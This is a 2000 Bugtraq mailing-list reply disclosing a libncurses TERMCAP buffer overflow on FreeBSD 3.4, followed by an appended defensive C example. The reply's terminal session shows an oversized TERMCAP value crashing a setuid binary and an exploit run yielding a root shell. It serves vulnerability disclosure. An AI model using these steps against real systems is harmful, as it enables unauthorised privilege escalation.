Date: Tue, 25 Apr 2000 10:50:42 +0200
From: "Przemyslaw Frasunek" <venglin@freebsd.lublin.pl>
To: "Kris Kennaway" <kris@FreeBSD.org>
Cc: <BUGTRAQ@SECURITYFOCUS.COM>, <freebsd-security@freebsd.org>
Subject: Re: freebsd libncurses overflow
Message-ID: <002801bfae93$5b7e69a0$0273b6d4@freebsd.lublin.pl>
References: <Pine.BSF.4.21.0004241225510.77386-100000@freefall.freebsd.org>
> Furthermore, it is not actually a vulnerability. It seems that setuid
> programs will not accept an alternate termcap file via TERMCAP even under
> the old version of ncurses in FreeBSD 3.x. Therefore this "exploit" can
> only be used on your own binaries.

Sure?

lubi:venglin:~> uname -a
FreeBSD lubi.freebsd.lublin.pl 3.4-STABLE FreeBSD 3.4-STABLE #1: Wed Mar 1 11:18:54 CET 2000 venglin@lubi.freebsd.lublin.pl:/mnt/elite/usr/src/sys/compile/GADACZKA i386
lubi:venglin:~> cat dupa.c
main() { initscr(); }
lubi:venglin:~> cc -o d dupa.c -lncurses
lubi:venglin:~> su
s/key 76 ve15188
Password:
lubi:venglin:/home/venglin# chmod 4755 d ; chown root.wheel d
lubi:venglin:/home/venglin# exit
lubi:venglin:~> ./d
lubi:venglin:~> setenv TERMCAP `perl -e 'print "A"x5000'`
lubi:venglin:~> ./d
Segmentation fault
lubi:venglin:~> ./dupaexp 4000
ret: 0xbfbfba8c
# id
uid=0(root) gid=1001(users) groups=1001(users), 0(wheel)

Obviously, *most* binaries are dropping root privileges before using any ncurses functions.

--
* Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL: PMF9-RIPE *
* Inet: venglin@freebsd.lublin.pl ** PGP: D48684904685DF43 EA93AFA13BE170BF *
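A defender-side illustration of the two safeguards this exchange turns on (a set-user-ID program refusing a TERMCAP entry from its environment, and dropping privileges before any ncurses call), added here as an example; it is not code from the original post or from ncurses. The buffer size, the function names and the getuid/geteuid comparison standing in for BSD issetugid() are assumptions.

```c
/* Added example: how a set-user-ID program should treat TERMCAP.
 * Not from the original post or from ncurses; names and sizes are assumed. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define TERMCAP_MAX 1024 /* assumed fixed-size termcap entry buffer */

/* Non-zero when the process holds privileges its invoker did not have
 * (portable stand-in for BSD issetugid()). */
int running_setugid(void)
{
    return getuid() != geteuid() || getgid() != getegid();
}

/* Copy a user-supplied TERMCAP value into a fixed-size buffer.
 * Returns 0 on success, -1 when the value is rejected. The privilege state
 * is passed in explicitly so the policy can be exercised without root. */
int accept_termcap(const char *value, int privileged, char *buf, size_t buflen)
{
    if (value == NULL || privileged)
        return -1;               /* setuid: the environment is untrusted, ignore it */
    const char *end = memchr(value, '\0', buflen);
    if (end == NULL)
        return -1;               /* no terminator within buflen: would overflow */
    memcpy(buf, value, (size_t)(end - value) + 1);
    return 0;
}

/* Drop elevated privileges before calling into code that reads the
 * environment: group first, then user, and verify the drop took effect. */
int drop_privileges(void)
{
    if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
        return -1;
    return running_setugid() ? -1 : 0;
}

int main(void)
{
    char entry[TERMCAP_MAX];
    int privileged = running_setugid();
    if (accept_termcap(getenv("TERMCAP"), privileged, entry, sizeof entry) == 0)
        printf("using TERMCAP from environment (%zu bytes)\n", strlen(entry));
    else
        printf("ignoring TERMCAP (privileged=%d)\n", privileged);
    return 0;
}
```

With a 5000-byte TERMCAP like the one in the session above, accept_termcap returns -1 instead of writing past the buffer, and a setuid caller gets -1 regardless of the value.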